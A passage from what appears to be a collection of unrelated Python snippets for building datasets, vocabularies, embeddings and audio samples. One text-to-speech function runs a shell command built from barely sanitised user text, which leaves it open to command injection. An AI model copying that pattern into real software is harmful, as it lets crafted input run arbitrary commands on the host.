Vocab\n token_path = os.path.join(data_dir, self.vocab_filename)\n if not tf.gfile.Exists(token_path):\n token_tmp_path = os.path.join(tmp_dir, self.vocab_filename)\n tf.gfile.Copy(token_tmp_path, token_path)\n with tf.gfile.GFile(token_path, mode=\"r\") as f:\n vocab_data = \"<pad>\\n<EOS>\\n\" + f.read() + \"UNK\\n\"\n with tf.gfile.GFile(token_path, mode=\"w\") as f:\n f.write(vocab_data)\n\n return text_problems.text2text_txt_iterator(train_path + \".en\",\n train_path + \".de\")", "def generate_embeddings_sentence_test_data(data, path_out):\n flair.device = torch.device('cpu')\n dicts = []\n # init multilingual BERT\n bert_embedding = TransformerDocumentEmbeddings('bert-base-multilingual-cased')\n counter = 0\n for entry in data:\n print(\"Counter: \", counter)\n counter += 1\n text = entry[\"sentence\"]\n id = entry[\"id\"]\n sent = Sentence(text)\n bert_embedding.embed(sent)\n vec = sent.get_embedding().detach().numpy()\n dicts.append((id,vec))\n gc.collect()\n result = dicts\n file = open(path_out, \"wb\")\n pickle.dump(result, file)\n file.close()\n return result", "def samples(self):\n if not self._samples:\n self._samples = defaultdict(list)\n blobs = self.blobs()\n sequencing = self._get_entities('sequencing')\n for s in self._get_entities('sample'):\n s = sample_factory(s, workspace=self, blobs=blobs, sequencing=sequencing, avro_path=self.avro_path)\n self._samples[s.subject_id].append(s)\n if s.missing_sequence:\n self.missing_sequence = s.missing_sequence\n return self._samples", "def _raw_data(data_path=None, backwards=False):\n train_path = \"dataset/treebank2/raw/wsj/\"\n test_path = \"dataset/SAT_Questions/\"\n question, answer = get_test_data(test_path)\n\n word_to_id = _build_vocab(train_path) \n train_data, train_sentences, train_data_in_list_of_lists = _file_to_word_ids(train_path, word_to_id, True, backwards)\n test_data, test_sentences, test_data_in_list_of_lists = _file_to_word_ids(test_path, word_to_id, False, backwards)\n vocabulary = len(word_to_id)\n return word_to_id, train_data, test_sentences, test_data_in_list_of_lists, question, answer", "def generate_samples(self, data_dir, tmp_dir, dataset_split):\r\n train = dataset_split == problem.DatasetSplit.TRAIN\r\n dataset_path = (\"train.tok.clean.bpe.32000\"\r\n if train else \"newstest2013.tok.bpe.32000\") # da controllare\r\n train_path = _get_wmt_enit_bpe_dataset(tmp_dir, dataset_path)\r\n\r\n # Vocab\r\n token_path = os.path.join(data_dir, self.vocab_filename)\r\n if not tf.gfile.Exists(token_path):\r\n token_tmp_path = os.path.join(tmp_dir, self.vocab_filename)\r\n tf.gfile.Copy(token_tmp_path, token_path)\r\n with tf.gfile.GFile(token_path, mode=\"r\") as f:\r\n vocab_data = \"<pad>\\n<EOS>\\n\" + f.read() + \"UNK\\n\"\r\n with tf.gfile.GFile(token_path, mode=\"w\") as f:\r\n f.write(vocab_data)\r\n\r\n return text_problems.text2text_txt_iterator(train_path + \".en\",\r\n train_path + \".it\")", "def construct_dataset(tri2index, num_examples=100, qap_path=\"./dataset/qa_pairs.dump\",\n label_path=\"./dataset/labels.dump\"):\n Xpair = []\n Y = []\n with open(DATA_PATH) as f:\n lines = csv.reader(f, delimiter=\"\\t\")\n i = 0\n for line in lines:\n q_processed = char_trigram_creator(preprocess(line[3]))\n a_processed = char_trigram_creator(preprocess(line[4]))\n # get the index of the array\n q_index = [tri2index[qp] for qp in q_processed]\n a_index = [tri2index[ap] for ap in a_processed]\n # append dataset\n Xpair.append((q_index, a_index)) # list of tuples\n Y.append(line[5].replace(\"\\n\", \"\"))\n # if i >= num_examples : break\n i += 1\n f.close()\n # shuffle the dataset\n Xs = np.asarray(Xpair[1:]) # discard the header\n Ys = np.asarray(Y[1:])\n perm = np.random.permutation(len(Xs))\n Xs = Xs[perm]\n Ys = Ys[perm]\n pickle.dump(Xs, open(qap_path, \"wb\"))\n pickle.dump(Ys, open(label_path, \"wb\"))", "def create_sample(self, sent, head_pred_id):\n return pandas.DataFrame({\"word\": sent,\n \"run_id\": [-1] * len(sent), # Mock running id\n \"head_pred_id\": head_pred_id})", "def create_sample(self, sent, head_pred_id):\n return pandas.DataFrame({\"word\": sent,\n \"run_id\": [-1] * len(sent), # Mock running id\n \"head_pred_id\": head_pred_id})", "def prepare(self):\n # get data from file\n train_data, test_data = return_speechacts()\n # y are the speechacts or 'labels'\n y_train = [t.split(' ')[0] for t in train_data]\n y_test = [t.split(' ')[0] for t in test_data]\n # x are the sentences\n x_train = [\" \".join(t.split(' ')[1:]) for t in train_data]\n x_test = [\" \".join(t.split(' ')[1:]) for t in test_data]\n # use the tokenizer and padding from keras to assign arrays of integers\n # to sentences, out of vocabulary token is 1\n self.tokenizer_x = Tokenizer(oov_token=1)\n self.tokenizer_x.fit_on_texts(x_train + x_test)\n xt_train = self.tokenizer_x.texts_to_sequences(x_train)\n xt_train = pad_sequences(xt_train, maxlen=self.sentence_size,\n dtype='int32')\n xt_test = self.tokenizer_x.texts_to_sequences(x_test)\n xt_test = pad_sequences(xt_test, maxlen=self.sentence_size,\n dtype='int32')\n # vocab is the number of words in our vocabulary\n self.vocab = len(self.tokenizer_x.word_index) + 1\n # do the same for labels\n self.tokenizer_y = Tokenizer()\n self.tokenizer_y.fit_on_texts(y_train + y_test)\n yt_train = self.tokenizer_y.texts_to_sequences(y_train)\n yt_train = [t[0] for t in yt_train]\n yt_train = to_categorical(yt_train)\n yt_test = self.tokenizer_y.texts_to_sequences(y_test)\n yt_test = [t[0] for t in yt_test]\n yt_test = to_categorical(yt_test)\n self.x_train = x_train\n self.y_train = y_train\n self.x_test = x_test\n self.y_test = y_test\n self.xt_train = xt_train\n self.yt_train = yt_train\n self.xt_test = xt_test\n self.yt_test = yt_test", "def getSampleDataSet():\n ds = [{\"name\": \"Denise\", \"sex\": \"F\"},\n \t{\"name\": \"Paul\", \"sex\": \"M\"}]\n return ds", "def load_train_dataset(data_dir, word_list, silence_percentage, noise_percentage):\n validation_percentage, testing_percentage = 0.1, 0.1\n temp_list = []\n\n #wav_lists = os.path.join(data_dir, *, '*.wav')\n for word_l in word_list:\n #wav_word_list = os.path.join(data_dir, word_l)\n wav_list = os.path.join(data_dir, word_l, '*.wav')\n for file in gfile.Glob(wav_list):\n _, word = os.path.split(os.path.dirname(file))\n word = word.lower()\n\n if which_set(file, validation_percentage, testing_percentage) == 'training':\n rate, signal = load_wav(file);\n signal_and_noise = add_noise(signal, rate, 1, os.path.join(data_dir,'_background_noise_'), noise_percentage)\n \n feature = psf.mfcc(signal_and_noise, rate, nfilt = 40,numcep = 12, appendEnergy = False)\n #if feature.shape[0] != 99:\n # print(str(len(signal)) + \" \" + str(rate))\n temp_list.append({'feature': feature, 'label': word_l})\n\n # hotspot\n #silence = len(X_train) * silence_percentage\n silence = int(math.ceil(len(temp_list) * silence_percentage / 100))\n for _ in range(silence):\n temp_list.append({'feature': 0, 'label': \"_silence_\"})\n\n random.shuffle(temp_list)\n\n X_train = np.zeros((len(temp_list), 99, 12))\n Y_train = np.zeros( len(temp_list) )\n\n for i in range(len(X_train)):\n X_train[i] = temp_list[i]['feature']\n Y_train[i] = word2index(temp_list[i]['label'])\n\n return X_train, Y_train", "def gen_random_samples():\n if os.path.exists('Song_Samples'):\n pass\n else:\n os.mkdir('Song_Samples')\n for filename in os.listdir(\"Songs\"):\n rate, data = wavfile.read(os.path.join(\"Songs\", filename))\n song_duration = len(data) // rate\n start_point = randint(0, song_duration - SAMPLE_DURATION)\n end_point = start_point + SAMPLE_DURATION\n subprocess.call(['ffmpeg', '-i', os.path.join(\"Songs\", filename),\n '-ss', str(datetime.timedelta(seconds=start_point)), '-to',\n str(datetime.timedelta(seconds=end_point)), '-y', os.path.join(\"Song_Samples\", filename)])", "def samples(self, gp, Y_metadata=None, samples=1):\n raise NotImplementedError(\"\"\"May be possible to use MCMC with user-tuning, see\n MCMC_pdf_samples in likelihood.py and write samples function\n using this, beware this is a simple implementation\n of Metropolis and will not work well for all likelihoods\"\"\")", "def create_samples(self):\n sample_list = []\n genes = []\n for record in range(len(self.data_dict[\"samples\"])):\n sample_id = self.data_dict[\"samples\"][record]\n genes_cols = list(self.data_dict.keys())[2:]\n for gene in genes_cols:\n genes.append(self.data_dict[gene][record])\n label = self.data_dict[\"type\"][record]\n sample_list.append(Sample(sample_id, genes, label))\n genes = []\n return sample_list", "def make_dataset():\n\n\tnumberOfTrials = dataset_params.num_of_samples\n\tnumberOfTrials_train = int(numberOfTrials*0.8)\n\tnumberOfTrials_test = int(numberOfTrials*0.2)\n\n\tprint(\"==================================================\")\n\tprint(\"1. Generating Train images ......\")\n\tprint(\"\\nTrain image per variation\", numberOfTrials_train)\n\tmakeDataset(numberOfTrials_train, \"train\")\n\n\tprint(\"==================================================\")\n\tprint(\"2. Generating Test images ......\")\n\tprint(\"\\nTest image per variation\", numberOfTrials_test)\n\tmakeDataset(numberOfTrials_test, \"test\")\n\n\tprint(\"==================================================\")\n\tprint(\"Done!!!\")", "def main():\n # Load and prep training files\n raw_speech_text = hg.load_training_file('trump_train.txt')\n speech_text = hg.prep_training(raw_speech_text)\n tweet_data = load_tweets('trump_tweets.json')\n raw_tweets = \"\"\n for dct in tweet_data:\n raw_tweets += \"{} \".format(dct['text'])\n tweets = hg.prep_training(raw_tweets)\n corpus = speech_text + tweets\n corpus = strip_punctuation(corpus)\n dict_1 = hg.map_one_to_one(corpus)\n dict_2 = hg.map_two_to_one(corpus)\n text = []\n \n # Introduction\n print(\"\\nTrump Speech Generator\\n\")\n print(\"Select words to add to speech\")\n print(\"\\'x\\' to exit\")\n print(\"\\'p\\' to add punctuation\")\n print(\"Select \\'p\\' before selecting the word you want to punctuate\")\n\n # Select first word\n options = corpus\n print ()\n selection = select_word(corpus)\n text.append(selection)\n \n # Select second word\n last = text[0]\n options = word_after_one(last, dict_1)\n print_text(text)\n selection = select_word(options)\n text.append(selection)\n \n # Select subsequent word\n while True:\n last = \"{} {}\".format(text[-2].strip(punctuation),\n text[-1].strip(punctuation))\n options = word_after_two(last, dict_2)\n if options == []:\n last = last.split()[1]\n options = word_after_one(last, dict_1)\n while options == []:\n last = random.choice(corpus)\n options = word_after_one(last, dict_1)\n print_text(text)\n selection = select_word(options)\n text.append(selection)\n \n print_text(text)", "def create_melspectrogram_dataset(label_folder='electronic_music/Trance_label/Train/', save_folder='song_mel_label_data',\n sr=44100, n_mels=128, n_fft=2048, hop_length=512, song_duration=180.0,\n create_data=False):\n if create_data:\n # get list of all labels\n os.makedirs(save_folder, exist_ok=True)\n labels = [path for path in os.listdir(label_folder) if os.path.isdir(label_folder + path)]\n\n # iterate through all lables, songs and find mel spectrogram\n for label in labels:\n print('{} \\n'.format(label))\n label_path = os.path.join(label_folder, label)\n label_songs = os.listdir(label_path)\n\n for song in label_songs:\n print(song)\n song_path = os.path.join(label_path, song)\n\n # Create mel spectrogram for song_duration in the middle of the song and convert it to the log scale\n audio = MP3(song_path)\n audio_lenght = int(audio.info.length)\n audio_middle = (audio_lenght - int(song_duration))/2\n y, sr = librosa.load(song_path, sr=sr, offset=audio_middle, duration=song_duration)\n S = librosa.feature.melspectrogram(y, sr=sr, n_mels=n_mels, n_fft=n_fft, hop_length=hop_length)\n log_S = librosa.logamplitude(S, ref_power=1.0)\n data = (label, log_S, song)\n\n # Save each song\n save_name = label + '_%%-%%_' + song\n with open(os.path.join(save_folder, save_name), 'wb') as fp:\n dill.dump(data, fp)", "def main():\n # transcribe_audio()\n summarize()", "def tonify(self, tone_generator=None, verbose=False):\n if tone_generator is None:\n tone_generator = ToneGenerator('tonifyoutput.wav')\n tone_generator.file.setnchannels(len(self.sheets))\n # Find the max length (in seconds) of the data sheets\n max_length = 0.0\n for sheet in self.sheets:\n if len(sheet) > max_length:\n max_length = len(sheet)\n nframes = int(max_length * tone_generator.sample_rate)\n tone_generator.file.setnframes(nframes)\n\n tone_strs = []\n for d in self.sheets:\n if verbose:\n print \"File:\", d.data.name\n print \"Frequencies:\", self.freqs[self.sheets.index(d)]\n values = []\n tone_generator.setfreqs(self.freqs[self.sheets.index(d)])\n for i in range(0, len(d.times)):\n duration = d.durations[i]\n calls = d.calls[i]\n if verbose:\n print \"\\ttone: (%d, %d, %d) for %f seconds\" % (calls[0], calls[1],\n calls[2], duration)\n tone = tone_generator.get_tone((calls[0], calls[1], calls[2]), duration)\n values.append(str(tone))\n try:\n delta = float((d.times[i + 1] - d.times[i]).seconds)\n if float(delta) - duration < 0.0:\n silence_duration = 0.0\n else:\n silence_duration = float(delta) - duration\n except IndexError:\n break\n if verbose:\n print \"\\tsilence for\", silence_duration,\"seconds\"\n silence = tone_generator.get_silence(silence_duration)\n values.append(str(silence))\n if len(d) < max_length:\n end_silence = tone_generator.get_silence(max_length - len(d))\n values.append(str(end_silence))\n value_str = ''.join(values)\n tone_strs.append(value_str)\n \n if verbose:\n print \"Writing to file... (may take several minutes)\"\n combined = interleave_binarystr(tone_strs)\n tone_generator.file.writeframes(combined)\n if verbose:\n print \"Finished writing.\"\n tone_generator.close()", "def create_mixture_csv(data_type):\n \n workspace = config.workspace\n data_dir = config.data_dir\n speech_dir = os.path.join(data_dir,'{}_speech'.format(data_type))\n noise_dir = os.path.join(data_dir,'{}_noise'.format(data_type)) \n magnification = config.magnification\n fs = config.sample_rate\n \n speech_names = [na for na in os.listdir(speech_dir) if na.lower().endswith(\".wav\")]\n noise_names = [na for na in os.listdir(noise_dir) if na.lower().endswith(\".wav\")]\n \n rs = np.random.RandomState(0)\n out_csv_path = os.path.join(workspace, \"mixture_csvs\", \"%s.csv\" % data_type)\n create_folder(os.path.dirname(out_csv_path))\n \n cnt = 0\n f = open(out_csv_path, 'w')\n f.write(\"%s\\t%s\\t%s\\t%s\\n\" % (\"speech_name\", \"noise_name\", \"noise_onset\", \"noise_offset\"))\n for speech_na in speech_names:\n # Read speech. \n speech_path = os.path.join(speech_dir, speech_na)\n (speech_audio, _) = read_audio(speech_path)\n len_speech = len(speech_audio)\n \n # For training data, mix each speech with randomly picked #magnification noises. \n if data_type == 'train':\n selected_noise_names = rs.choice(noise_names, size=magnification, replace=False)\n # For test data, mix each speech with all noises. \n elif data_type == 'test':\n selected_noise_names = noise_names\n else:\n raise Exception(\"data_type must be train | test!\")\n\n # Mix one speech with different noises many times. \n for noise_na in selected_noise_names:\n noise_path = os.path.join(noise_dir, noise_na)\n (noise_audio, _) = read_audio(noise_path)\n \n len_noise = len(noise_audio)\n\n if len_noise <= len_speech:\n noise_onset = 0\n nosie_offset = len_speech\n # If noise longer than speech then randomly select a segment of noise. \n else:\n noise_onset = rs.randint(0, len_noise - len_speech, size=1)[0]\n nosie_offset = noise_onset + len_speech\n \n if cnt % 100 == 0:\n print(cnt)\n \n cnt += 1\n f.write(\"%s\\t%s\\t%d\\t%d\\n\" % (speech_na, noise_na, noise_onset, nosie_offset))\n f.close()\n print(out_csv_path)\n print(\"Create %s mixture csv finished!\" % data_type)", "def create(self) -> List[\"Sample\"]:\n self.is_savable(do_raise=True)\n return self.session.utils.create_samples([self])", "def _create_fake_dataset(output_path, seq_length, include_sentence_id):\n writer = tf.io.TFRecordWriter(output_path)\n\n def create_int_feature(values):\n f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n return f\n\n for i in range(100):\n features = {}\n input_ids = np.random.randint(100, size=(seq_length))\n features['input_ids'] = create_int_feature(input_ids)\n features['input_mask'] = create_int_feature(np.ones_like(input_ids))\n features['segment_ids'] = create_int_feature(np.ones_like(input_ids))\n features['label_ids'] = create_int_feature(\n np.random.randint(10, size=(seq_length)))\n if include_sentence_id:\n features['sentence_id'] = create_int_feature([i])\n features['sub_sentence_id'] = create_int_feature([0])\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=features))\n writer.write(tf_example.SerializeToString())\n writer.close()", "def get_preprocessed_dataset(self, hop_length=512, norm_to_C=False, spectrogram_generator=log_mel_spectrogram, n_frames=500, from_song_ind = 0, to_song_ind = 225, separately = False) -> tuple:\n FEATURESs = []\n CHORDs = self.CHORDS\n TIME_BINSs = []\n KEYs = []\n i = 0\n separate_data, separate_targets = [], []\n for data, keys, chords in zip(self.DATA, self.KEYS, self.CHORDS):\n print(i)\n if(i >= from_song_ind and i < to_song_ind):\n if separately:\n features = IsophonicsDataset.preprocess_audio(waveform=data.WAVEFORM, sample_rate=data.SAMPLE_RATE, spectrogram_generator=spectrogram_generator, nfft=self.NFFT, hop_length=hop_length, norm_to_C=norm_to_C, key=keys.get_first_key()).swapaxes(0,1)\n num_samples, _ = features.shape\n time_bins = [float(i)/(float(self.SAMPLE_RATE) / float(hop_length)) for i in range(num_samples)]\n prep_data, prep_targets = Dataset.songs_to_sequences(FEATURESs=[features], CHORDs=[chords], TIME_BINSs=[time_bins], KEYs=[keys.get_first_key()], n_frames=n_frames, norm_to_C=norm_to_C)\n separate_data.append(prep_data)\n separate_targets.append(prep_targets)\n else:\n FEATURESs.append((IsophonicsDataset.preprocess_audio(waveform=data.WAVEFORM, sample_rate=data.SAMPLE_RATE, spectrogram_generator=spectrogram_generator, nfft=self.NFFT, hop_length=hop_length, norm_to_C=norm_to_C, key=keys.get_first_key()).swapaxes(0,1)))\n num_samples, _ = FEATURESs[-1].shape\n TIME_BINSs.append([float(i)/(float(self.SAMPLE_RATE) / float(hop_length)) for i in range(num_samples)])\n KEYs.append(keys.get_first_key())\n i = i + 1\n if separately:\n return np.array(separate_data), np.array(separate_targets)\n else:\n return Dataset.songs_to_sequences(FEATURESs=FEATURESs, CHORDs=CHORDs, TIME_BINSs=TIME_BINSs, KEYs=KEYs, n_frames=n_frames, norm_to_C=norm_to_C)", "def create_synthetic_noise_dataset(cfg):\n from colorednoise import powerlaw_psd_gaussian\n\n betas = np.linspace(cfg['data.mix_synthetic_noise.min_beta'],\n cfg['data.mix_synthetic_noise.max_beta'],\n num=cfg['data.mix_synthetic_noise.num_samples'])\n sample_rate = cfg['data.sample_rate']\n segment_length = 2 * cfg['data.len_min']\n wavs = [powerlaw_psd_gaussian(beta, sample_rate * segment_length)\n for beta in betas]\n wavs = [audio.normalize(wav, low=-1, high=1) for wav in wavs]\n return NoiseDataset(wavs)", "def _make_vocab_files(self):\n self.logger.info('making question vocab...' + self.opt.QUESTION_VOCAB_SPACE)\n qdic, _ = self.load_data(self.opt.QUESTION_VOCAB_SPACE)\n question_vocab = VQADataProvider.make_question_vocab(qdic, self.max_length)\n self.logger.info('making answer vocab...' + self.opt.ANSWER_VOCAB_SPACE)\n qdic, adic = self.load_data(self.opt.ANSWER_VOCAB_SPACE)\n answer_vocab = VQADataProvider.make_answer_vocab(adic, qdic, self.opt.MAX_ANSWER_VOCAB_SIZE, self.use_ocr)\n return question_vocab, answer_vocab", "def generate_data(self):\n\n column_num = 1\n src_path = self.src_paths_after_pre_process\n target_path = self.tgt_paths_after_pre_process\n\n src_ds = load_textline_dataset([src_path], column_num)\n\n src_ds = src_ds[0]\n\n input_pipeline_func = self.get_input_pipeline(for_export=False)\n\n src_ds = src_ds.map(\n input_pipeline_func, num_parallel_calls=self.num_parallel_calls)\n\n src_size_ds = src_ds.map(\n lambda x: compute_sen_lens(x, padding_token=utils.PAD_IDX),\n num_parallel_calls=self.num_parallel_calls)\n\n src_ds = src_ds.map(\n self.exclude_padding, num_parallel_calls=self.num_parallel_calls)\n\n if self.infer_without_label:\n data_set = tf.data.Dataset.zip((src_ds, src_size_ds))\n\n else:\n tgt = load_textline_dataset([target_path], column_num)\n tgt = tgt[0]\n tgt_out_ds = tgt.map(lambda x: x + ' ' + self.END_TOKEN)\n tgt_in_ds = tgt.map(lambda x: self.START_TOKEN + ' ' + x)\n\n tgt_in_ds = tgt_in_ds.map(\n lambda batch: self.text_pipeline_func(batch, self.max_dec_len, self.\n text_vocab_file_path),\n num_parallel_calls=self.num_parallel_calls)\n\n tgt_in_size_ds = tgt_in_ds.map(\n lambda x: compute_sen_lens(x, padding_token=utils.PAD_IDX),\n num_parallel_calls=self.num_parallel_calls)\n\n tgt_in_ds = tgt_in_ds.map(\n self.exclude_padding, num_parallel_calls=self.num_parallel_calls)\n\n inp_ds = tf.data.Dataset.zip(\n (src_ds, src_size_ds, tgt_in_ds, tgt_in_size_ds))\n\n if self.use_label_vocab:\n target_vocab_file_path = self.label_vocab_file_paths[0]\n else:\n target_vocab_file_path = self.text_vocab_file_path\n tgt_out_ds = tgt_out_ds.map(\n lambda batch: self.text_pipeline_func(batch, self.max_dec_len,\n target_vocab_file_path),\n num_parallel_calls=self.num_parallel_calls)\n\n tgt_out_ds = tgt_out_ds.map(\n self.exclude_padding, num_parallel_calls=self.num_parallel_calls)\n data_set = tf.data.Dataset.zip((inp_ds, tgt_out_ds))\n\n vocab_dict = load_vocab_dict(self.text_vocab_file_path)\n vocab_size = len(vocab_dict)\n label_vocab_dict = load_vocab_dict(self.label_vocab_file_paths[0])\n label_vocab_size = len(label_vocab_dict)\n data_size = get_file_len(self.src_paths_after_pre_process)\n self.config['data']['vocab_size'] = vocab_size\n self.config['data']['label_vocab_size'] = label_vocab_size\n self.config['data']['{}_data_size'.format(self.mode)] = data_size\n\n return data_set", "def generate_dataset(self):\n sets = {\n \"train\": 10,\n \"test\": 5,\n }\n\n fields = {\n \"strings_list\": lambda x: str_to_ascii(self.generate_string_list(x)),\n \"data\": lambda x: np.random.randint(0, 10, (x, 10)),\n \"number\": lambda x: np.array(range(x)),\n \"field_with_a_long_name_for_printing\": lambda x: np.array(range(x)),\n }\n\n lists = {\n \"list_dummy_data\": np.array(range(10)),\n \"list_dummy_number\": np.array(range(10), dtype=np.uint8),\n }\n\n dataset = {}\n data_fields = {}\n for set_name in sets:\n dataset[set_name] = self.populate_set(sets[set_name], fields, lists)\n data_fields[set_name] = sorted(dataset[set_name].keys())\n\n return dataset, data_fields", "def generate_datasets(self, rand=None, *args, **kwargs):\n raise NotImplementedError()", "def get_data(self, num_samples):\n data = []\n for _ in range(num_samples):\n t, acqd, sample = self.get_sample()\n data.append(ReSkinData(\n time=t,\n acq_delay=acqd,\n data=sample,\n dev_id=self.device_id\n ))\n \n return data", "def get_speech_seed():\n return [\"http://www.americanrhetoric.com/speechbanka-f.htm\",\n \"http://www.americanrhetoric.com/speechbankg-l.htm\",\n \"http://www.americanrhetoric.com/speechbankm-r.htm]\",\n \"http://www.americanrhetoric.com/speechbanks-z.htm\"]", "def prepare_audio(a_name, target=False):\n samprate = 16000 # Sampling Rate\n length = 16 # Amount of blocks for 1 walkthrough\n overlap = 8 # Step between samples in amount of blocks\n fft = 1024 # Length of block (64ms)\n\n # Upload and preparing data sets\n # audio_path = \"raw_data_wav/\"\n # full_a_name = audio_path + a_name\n print('loading %s' % a_name)\n audio, _ = lr.load(a_name, sr=samprate)\n audio = filter_audio(audio) # Removing silence and spaces between words\n data = lr.stft(audio, n_fft=fft).swapaxes(0, 1) # Export spectrogram\n samples = []\n\n for i in range(0, len(data) - length, overlap):\n samples.append(np.abs(data[i:i + length])) # Create training sample\n\n results_shape = (len(samples), 1)\n results = np.ones(results_shape) if target else np.zeros(results_shape)\n\n return np.array(samples), results", "def main():\n # get config and processing of clauses\n config = Config(load=False)\n\n # Generators\n dev = Dataset(config.filename_dev)\n test = Dataset(config.filename_test)\n train = Dataset(config.filename_train)\n\n # Build tags vocab\n vocab_tags = get_tag_vocab([train, dev, test])\n vocab_tags.add(UNK)\n\n # Save vocab\n write_vocab(vocab_tags, config.filename_tags)\n\n\n # Build and save char vocab\n train = Dataset(config.filename_train)\n vocab_chars = get_char_vocab(train)\n write_vocab(vocab_chars, config.filename_chars)", "def sim_dataset(rs, num_encs,M,pos_class_rate = 0.5):\n np.random.seed(seed=rs)\n data = []\n num_timepoints = np.random.randint(30,50, size=num_encs)\n #signal used to modify timeseries of cases:\n channel_vec = np.random.randint(-1,2,M) #vector of values from -1 to 1 of length M \n #Define patient ids and cases & controls \n pat_ids = np.arange(num_encs)\n case_index = int(num_encs*pos_class_rate) \n case_ids = pat_ids[:case_index]\n control_ids = pat_ids[case_index:] \n \n print(f'Simming {num_encs} patients ..') \n #Generate Data for cases and controls\n for i in pat_ids:\n length = num_timepoints[i]\n if i < case_index:\n #generate case\n labels, onset = create_label(length, case=True)\n X = generate_time_series(length, M)\n X = add_signal(X, onset, channel_vec) \n X['SepsisLabel']= labels \n else:\n #generate control\n labels, _ = create_label(length, case=False)\n X = generate_time_series(length, M)\n X['SepsisLabel']= labels\n data.append(X) \n #Shuffle list of patients\n np.random.shuffle(data)\n return data", "def data_gen(voc_size, batch, nbatches, seq_len = 15):\r\n for i in range(nbatches):\r\n # (batch_size, seq_len)\r\n data = torch.from_numpy(\r\n np.random.randint(1, voc_size, size=(batch, seq_len)))\r\n data[:, 0] = 1 # add start token\r\n src = Variable(data, requires_grad=False)\r\n tgt = Variable(data, requires_grad=False)\r\n yield Batch(src, tgt, 0) # Accessed by next function one by one\r", "def sample(self,\n data: Sequence[Sequence[torch.Tensor]],\n n_epochs: int = 1) -> Tuple[List[List[int]], List[List[int]], List[int]]:\n\n all_queries = []\n all_targets = []\n for q, t in data:\n all_queries.append(q)\n all_targets.append(t)\n\n print(f'sampler size: {len(all_queries)}')\n\n\n self.n_batch = int(np.ceil(data.__len__() / self.batch_size))\n print(\"n_batch:\", self.n_batch)\n\n for i in range(self.n_batch):\n # position = i * self.batch_size\n # queries = all_queries[position:position + self.batch_size]\n # targets = all_targets[position:position + self.batch_size]\n sample_index = np.random.choice(len(all_queries), self.batch_size)\n queries = [all_queries[i] for i in sample_index]\n targets_label = [all_targets[i] for i in sample_index]\n\n # targets = self.transform_label(targets_label)\n\n # labels = np.arange(len(queries))\n\n # queriess = np.array(queries)\n all_targets_text = self.all_targets\n queries = pad_sequence(queries, batch_first=self.batch_first, padding_value=0)\n\n # targets, queries, labels = torch.tensor(targets), torch.tensor(labels)\n # print(queries[:5])\n # print(len(all_targets_text))\n\n\n targets_label = torch.tensor(targets_label)\n yield (queries, all_targets_text, targets_label)", "def _create(self, sound: (list, tuple), data: dict):\n # data substitution\n # TODO: use other params\n inversion: int = data['inversion']\n single_tone: bool = data['single_tone']\n with_bass: bool = data['with_bass']\n bass_note: int = data['bass_note']\n transpose: int = data['transpose']\n octave: int = data['octave']\n pitch: float = data['pitch']\n sec: float = data['sec']\n sampling_rate: int = data['sampling_rate']\n volume_adjustment: (str, float) = data['volume_adjustment']\n title: str = data['title']\n at: str = data['at']\n\n # -*- data sanitization -*-\n # transpose range\n if transpose < -11 or 11 < transpose:\n raise ValueError('\\'transpose\\' should be between -11 and 11.')\n\n # pitch range\n if pitch < 410 or 494 < pitch:\n raise ValueError('\\'pitch\\' should be between 410 and 494.')\n\n # file title regulation\n if not re.fullmatch(r'.+?\\.wav$', title):\n title += '.wav'\n\n # wave initialization\n wave = SoundGenerator.oscillator(0, sec, sampling_rate)\n # -*- end of the data sanitization -*-\n\n # elements' frequencies\n fn = -1 # fn is a num the one before\n\n # wave synthesize\n for i in sound:\n if fn >= i:\n # 15 = 12(octave) + 3(C base-> A base convert)\n f = pitch * 2 ** ((15 + i) / 12)\n else:\n f = pitch * 2 ** ((3 + i) / 12)\n\n wave += SoundGenerator.oscillator(f, sec, sampling_rate)\n\n # memory a number the one before\n fn = i\n\n # volume controlling\n if volume_adjustment == 'auto':\n wave *= 0.1\n elif isinstance(volume_adjustment, (int, float)):\n wave *= volume_adjustment\n else:\n ValueError('\\'volume_adjustment\\' should be \\'auto\\' or float.')\n\n # wave convert\n wave = (wave * float(2 ** 15 - 1)).astype(np.int16)\n\n # path management\n if at is None:\n pth = os.path.join(os.getcwd(), title)\n else:\n os.chdir(at)\n pth = os.path.join(os.getcwd(), title)\n\n # make wave_file\n wavfile.write(pth, sampling_rate, wave)", "async def generate_audio(self, site, text, payload):\n cache_path = self.config['services']['Pico2wavTtsService'].get(\n 'cache_path', '/tmp/tts_cache')\n value = payload.get('id', 'no_id')\n\n if text:\n short_text = text[0:100].replace(' ', '_').replace(\".\", \"\")\n # speakable and limited\n say_text = text[0:300].replace('(', '').replace(')', '')\n short_file_name = clean_filename('tts-' + str(short_text)) + '.wav'\n file_name = os.path.join(cache_path, short_file_name)\n\n # generate if file doesn't exist in cache\n if not os.path.isfile(file_name):\n path = self.config['services']['Pico2wavTtsService']['binary_path']\n command = path + ' -w=' + file_name + ' \"{}\" '.format(say_text)\n executor = concurrent.futures.ProcessPoolExecutor(\n max_workers=1,\n )\n await self.loop.run_in_executor(executor, os_system, command)\n\n async with aiofiles.open(file_name, mode='rb') as send_file:\n audio_file = await send_file.read()\n await self.client.subscribe('hermod/{}/speaker/finished'.format(site))\n if site in self.clients and self.clients[site].get(\n 'platform', '') == \"web\" and self.clients[site].get('url', False):\n await self.client.publish(\\\n 'hermod/{}/speaker/play/{}'.format(site, value), payload=json.dumps({\n \"url\": self.clients[site].get('url') + \"/tts/\" + short_file_name\n }), qos=0)\n else:\n slice_length = 2048\n\n def chunker(seq, size):\n \"\"\" return chunks\"\"\"\n return (seq[pos:pos + size] for pos in range(0, len(seq), size))\n for chunk in chunker(audio_file, slice_length):\n await self.client.publish('hermod/{}/speaker/cache/{}'.format(site, value)\\\n , payload=bytes(chunk), qos=0)\n\n # finally send play message with empty payload\n await self.client.publish(\n 'hermod/{}/speaker/play/{}'.format(site, value), payload=None, qos=0)\n\n await self.cleanup_file(short_text, file_name)", "def build_dataset(bandits, T, H, seq):\n K = bandits[0].K\n dataset = {}\n for h in range(H):\n samples_h = bandits[seq[h]].sample(T)\n dataset[h] = samples_h\n return dataset", "def generate_mog_dataset():\n\n n_per_class = 100\n dim = 2\n n_gaussians = 4\n mus = [(0, 1), (-1, 0), (0, -1), (1, 0)]\n mus = [torch.tensor(m) for m in mus]\n var = 0.05\n\n inputs, labels = [], []\n\n for id in range(n_gaussians):\n # Generate input data by mu + x @ sqrt(cov)\n cov = np.sqrt(var) * 